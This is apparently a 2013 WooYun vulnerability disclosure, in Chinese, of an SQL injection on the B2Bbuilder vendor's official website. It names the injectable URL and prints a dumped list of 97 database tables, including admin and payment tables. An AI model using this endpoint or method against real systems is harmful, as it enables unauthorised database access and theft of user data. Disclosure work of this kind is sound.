当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-031909
漏洞标题:
B2Bbuilder官网SQL注入漏洞(可拖库)
相关厂商:
B2Bbuilder
漏洞作者:
xfkxfk
提交时间:
2013-07-23 10:30
修复时间:
2013-09-06 10:31
公开时间:
2013-09-06 10:31
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-07-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

B2Bbuilder官网SQL注入漏洞(可拖库)
还有报路径啊

详细说明:

存在注入的url:

http://www.b2b-builder.com/announcement.php?id=30


报绝对路径漏洞:

zhuzhan1.png


官网主站的数据库:

zhuzhan2.png


数据库demomallcn的数据表:

Database: demomallcn
[97 tables]
+-----------------------------------+
| b2bbuilder_activity               |
| b2bbuilder_activity_product_list  |
| b2bbuilder_admin                  |
| b2bbuilder_admin_group            |
| b2bbuilder_admin_operation_log    |
| b2bbuilder_advs                   |
| b2bbuilder_advs_con               |
| b2bbuilder_album                  |
| b2bbuilder_announcement           |
| b2bbuilder_auditing               |
| b2bbuilder_brand                  |
| b2bbuilder_brand_cat              |
| b2bbuilder_comment                |
| b2bbuilder_contags                |
| b2bbuilder_cron                   |
| b2bbuilder_custom_cat             |
| b2bbuilder_custom_service         |
| b2bbuilder_defind_1               |
| b2bbuilder_defind_2               |
| b2bbuilder_defind_3               |
| b2bbuilder_defind_4               |
| b2bbuilder_delivery_address       |
| b2bbuilder_district               |
| b2bbuilder_fast_mail              |
| b2bbuilder_feed                   |
| b2bbuilder_filter_keyword         |
| b2bbuilder_logistics_temp         |
| b2bbuilder_logistics_temp_con     |
| b2bbuilder_mail_mod               |
| b2bbuilder_mail_record            |
| b2bbuilder_member                 |
| b2bbuilder_message                |
| b2bbuilder_nav_menu               |
| b2bbuilder_news                   |
| b2bbuilder_news_data              |
| b2bbuilder_newscat                |
| b2bbuilder_page_rec               |
| b2bbuilder_page_view              |
| b2bbuilder_payment_banks          |
| b2bbuilder_payment_card           |
| b2bbuilder_payment_cashflow       |
| b2bbuilder_payment_cashpickup     |
| b2bbuilder_payment_type           |
| b2bbuilder_payment_user           |
| b2bbuilder_points                 |
| b2bbuilder_product_cart           |
| b2bbuilder_product_cat            |
| b2bbuilder_product_comment        |
| b2bbuilder_product_delivery       |
| b2bbuilder_product_detail         |
| b2bbuilder_product_invoice        |
| b2bbuilder_product_order          |
| b2bbuilder_product_order_pro      |
| b2bbuilder_product_report         |
| b2bbuilder_product_report_subject |
| b2bbuilder_product_setmeal        |
| b2bbuilder_products               |
| b2bbuilder_property               |
| b2bbuilder_property_value         |
| b2bbuilder_reg_vercode            |
| b2bbuilder_reserve_username       |
| b2bbuilder_return                 |
| b2bbuilder_return_goods           |
| b2bbuilder_search_word            |
| b2bbuilder_shipping_address       |
| b2bbuilder_shop                   |
| b2bbuilder_shop_cat               |
| b2bbuilder_shop_domin             |
| b2bbuilder_shop_earnest           |
| b2bbuilder_shop_grade             |
| b2bbuilder_shop_link              |
| b2bbuilder_shop_navigation        |
| b2bbuilder_shop_setting           |
| b2bbuilder_shop_template          |
| b2bbuilder_site_spread            |
| b2bbuilder_sns                    |
| b2bbuilder_sns_friend             |
| b2bbuilder_sns_shareproduct       |
| b2bbuilder_sns_shareproduct_info  |
| b2bbuilder_sns_shareshop          |
| b2bbuilder_stop_ip                |
| b2bbuilder_sub_domain             |
| b2bbuilder_subscribe              |
| b2bbuilder_tags                   |
| b2bbuilder_talk                   |
| b2bbuilder_tg                     |
| b2bbuilder_tg_cat                 |
| b2bbuilder_tg_order               |
| b2bbuilder_user_comment           |
| b2bbuilder_user_connected         |
| b2bbuilder_user_group             |
| b2bbuilder_user_read_rec          |
| b2bbuilder_vote                   |
| b2bbuilder_web_con                |
| b2bbuilder_web_con_group          |
| b2bbuilder_web_config             |
| b2bbuilder_web_link               |
+-----------------------------------+


数据表b2bbuilder_admin 的部分内容:

zhuzhan3.png

漏洞证明:

见详细说明

修复方案:

过滤

版权声明:转载请注明来源 xfkxfk@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝